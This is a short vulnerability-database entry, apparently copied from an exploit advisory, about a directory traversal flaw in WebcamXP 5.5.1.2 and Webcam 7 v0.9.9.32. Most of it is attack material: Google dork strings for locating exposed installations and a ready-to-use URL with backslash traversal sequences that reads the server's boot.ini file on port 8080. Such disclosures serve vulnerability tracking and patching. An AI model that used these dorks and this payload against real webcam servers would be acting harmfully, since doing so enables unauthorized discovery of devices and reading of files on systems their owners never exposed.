webcamxp and webcam 7 - Directory Traversal vulnerability

2014-07-01T00:00:00
ID SSV:72603
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: WebcamXP and Webcam7 Directory Traversal Vulnerability
# Google Dork: "powered by webcamxp" xhtml css
# Google Dork: "powered by webcam 7"
# Date: 2/22/2012
# Author: Silent Dream
# Software Link: http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe
# Software Link: http://dl.filekicker.com/send/file/226161-G6BD/w7inst.exe
# Version: WebcamXP 5.5.1.2, Webcam 7 v0.9.9.32
# Tested on: Windows XP
# Similar to CVE: 2008-5862 but uses backslashes instead of encoded forward slashes.

http://ip:8080/..\..\..\..\..\..\..\..\..\..\..\boot.ini